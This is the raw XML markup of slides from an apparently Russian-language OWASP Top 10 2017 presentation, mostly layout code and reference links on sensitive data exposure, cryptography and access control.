          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="105099" tIns="52549" rIns="105099" bIns="52549"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2945660" cy="496332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="113843" tIns="56922" rIns="113843" bIns="56922" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850447" y="3"/>
            <a:ext cx="2945660" cy="496332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="113843" tIns="56922" rIns="113843" bIns="56922" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005013" y="746125"/>
            <a:ext cx="2787650" cy="3719513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="113843" tIns="56922" rIns="113843" bIns="56922" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679769" y="4715154"/>
            <a:ext cx="5438140" cy="4466987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="113843" tIns="56922" rIns="113843" bIns="569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28585"/>
            <a:ext cx="2945660" cy="496332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="113843" tIns="56922" rIns="113843" bIns="56922" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850447" y="9428585"/>
            <a:ext cx="2945660" cy="496332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="113843" tIns="56922" rIns="113843" bIns="56922"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smtClean="0"/>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smtClean="0"/>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smtClean="0"/>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smtClean="0"/>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Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><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OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><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Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2"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cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.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User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt"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secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.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blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.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cwe.mitre.org/data/definitions/611.html"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ww.owasp.org/index.php/Source_Code_Analysis_Tools"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web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.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cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" TargetMode="Externa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www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html"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s://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning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SVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.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Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.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s://cwe.mitre.org/data/definitions/79.html"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developer.mozilla.org/en-US/docs/Web/HTTP/CSP"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portswigger.net/kb/issues/00200308_clientsidetemplateinjection"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owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="Externa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frohoff.github.io/appseccali-marshalling-pickles/"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s://github.com/mbechler/marshalsec"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www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.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src.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External"/><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778.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owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html"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Category:OWASP_ModSecurity_Core_Rule_Set_Projec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owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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asd.gov.au/infosec/mitigationstrategies.htm"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nist.gov/cyberframework"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iso.org/isoiec-27001-information-security.html"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31000-risk-management.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168"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Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="(https:/portswigger.net/kb/issues/00101080_serversidetemplateinjection)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V5_Input_validation_and_output_encoding" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet"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for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.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Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaw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cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xm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s://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret"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github.com/danielmiessler/SecLists/tree/master/Passwords"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ru-RU" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Топ-10 OWASP - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Десять самых критичных угроз безопасности веб-приложений</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Данная работа выпущена под лицензией </a:t>
            </a:r>
            <a:b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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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(e.g. at an insecure wireless network), downgrades connections from HTTPS to HTTP,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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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sz="90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Is any data transmitted in clear text? This concerns protocols such as HTTP, SMTP, and FTP. External internet traffic is especially dangerous. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="9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Verify all internal traffic e.g. between load balancers, web servers, or back-end systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See ASVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Data Prot (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>SSL/TLS (V10)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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Protect Data</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OWASP Application Security Verification Standard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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8"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Transport Layer Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: User Privacy Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheets: Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Cryptographic Storage</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2"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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14"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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15"/>
              </a:rPr>
              <a:t>CWE-220: Exposure of sens. information through data queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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15"/>
              </a:rPr>
              <a:t>CWE-310: Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-311: Missing Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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17"/>
              </a:rPr>
              <a:t>CWE-312: Cleartext Storage of Sensitive Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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18"/>
              </a:rPr>
              <a:t>CWE-319: Cleartext Transmission of Sensitive Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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19"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-327: Broken/Risky Crypto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-359: Exposure of Private Information (Privacy Violation)</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ru-RU" sz="90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to privacy laws, regulatory requirements, or business needs.</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Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management.</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
